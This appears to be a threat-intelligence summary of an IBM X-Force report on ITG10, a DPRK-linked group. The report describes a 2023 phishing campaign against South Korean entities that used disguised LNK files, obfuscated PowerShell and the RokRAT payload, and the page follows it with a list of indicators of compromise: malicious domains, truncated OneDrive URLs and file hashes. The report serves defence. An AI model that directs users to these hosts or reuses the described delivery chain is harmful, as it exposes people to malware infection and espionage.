ITG10 Likely Targeting South Korean Entities of Interest to the Democratic People's Republic of Korea (DPRK)

2023-06-06 IBM

https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/

Thumbnail for ITG10 Likely Targeting South Korean Entities of Interest to the Democratic People's Republic of Korea (DPRK)

IBM X-Force reports that ITG10, whose TTPs overlap APT37 and ScarCruft, likely ran an April 2023 phishing campaign against South Korean government, communications, education, think-tank, dissident, and foreign-policy targets. The campaign used ZIP attachments containing LNK files disguised as documents, including Korean parliamentary and seminar lures plus energy and construction-themed decoys, to drop shortcut files with obfuscated PowerShell. The PowerShell chain downloaded second-stage RokRAT shellcode, a payload capable of C2 command execution, data exfiltration, file transfer, and keylogging. X-Force links the lure themes to DPRK interests around the Korean peninsula and South Korean overseas construction and energy ties.

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN partybbq.co.kr 2023-05-24 2024-11-13
URL https://api.onedrive.com/v1.0/s… 2023-06-06 2023-09-25
URL https://1drv.ms/u/s!AhQMP6eg8aR… 2023-05-01 2023-09-25
DOMAIN xn--vn4b27hka971hbue.kr 2023-06-06 2023-08-28
URL https://1drv.ms/u/s!AjQNLvEE_CU… 2023-05-01 2023-07-13
URL https://api.onedrive.com/v1.0/s… 2023-05-01 2023-07-13
URL https://api.onedrive.com/v1.0/s… 2023-04-21 2023-07-04
URL https://1drv.ms/i/s!AhXEXLJSNMP… 2023-04-21 2023-07-04
HASH 6753933cd54e4eba497c48d63c7418a… 2023-05-01 2023-06-26
HASH 7ef2c0d2ace70fedfe5cd919ad3959c… 2023-06-06 2023-06-06
HASH 5678196f512f8a531c7d85af8df4f40… 2023-06-06 2023-06-06
HASH 9854750f3880c7cee3281d8c33292ca… 2023-06-06 2023-06-06
HASH 7aa7233feb8e8a7b71ae6cdd0ddb8c2… 2023-06-06 2023-06-06
HASH f1289e7229ace984027f29cf8e2dd8f… 2023-06-06 2023-06-06
HASH 5815a6f7976e993fcdf9e024f466704… 2023-06-06 2023-06-06
HASH 7529eaeeb29c713f8e15827c79001a9… 2023-06-06 2023-06-06
HASH 6bab11d9561482777757f16c069ebef… 2023-06-06 2023-06-06
HASH cc6ae9670e38244e439711b1698f0db… 2023-06-06 2023-06-06
HASH 1ec4d60738a671f00089a86eeba6cb1… 2023-06-06 2023-06-06
HASH 50fe8a981a7d4824f0b297f37804b65… 2023-06-06 2023-06-06
HASH ce56b011ac4663a40f0ba606c98c08a… 2023-06-06 2023-06-06
HASH 76d0133d738876f314ae792d0cf9497… 2023-06-06 2023-06-06
HASH fa2ebcdfce8bbe4245ed77b43d39e22… 2023-06-06 2023-06-06
HASH 3d1d2d0464013d9e1dd7611d73176f3… 2023-06-06 2023-06-06
HASH 88c219656f853b2dc54ae02d32a716e… 2023-06-06 2023-06-06
URL https://api.onedrive.com/v1.0/s… 2023-06-06 2023-06-06
URL https://1drv.ms/i/s!AhXEXLJSNMP… 2023-06-06 2023-06-06
HASH cb4c7037c7620e4ce3f8f43161b0ec6… 2023-05-01 2023-06-06
HASH 240e7bd805bd7f2d17217dd4cebc03a… 2023-05-01 2023-06-06
HASH f92297c4efabba98befeb992a009462… 2023-05-01 2023-06-06
HASH 06431a5d8f6262cc3db39d911a920f7… 2023-05-01 2023-06-06
HASH 1c5b9409243bfb81a5924881cc05f63… 2023-05-01 2023-06-06
HASH 00d88009fa50bfab849593291cce20f… 2023-05-01 2023-06-06
URL https://1drv.ms/u/s!Au2my1xh6t8… 2023-04-21 2023-06-06
URL https://api.onedrive.com/v1.0/s… 2023-04-21 2023-06-06

Related Actors

Related Reports

« Back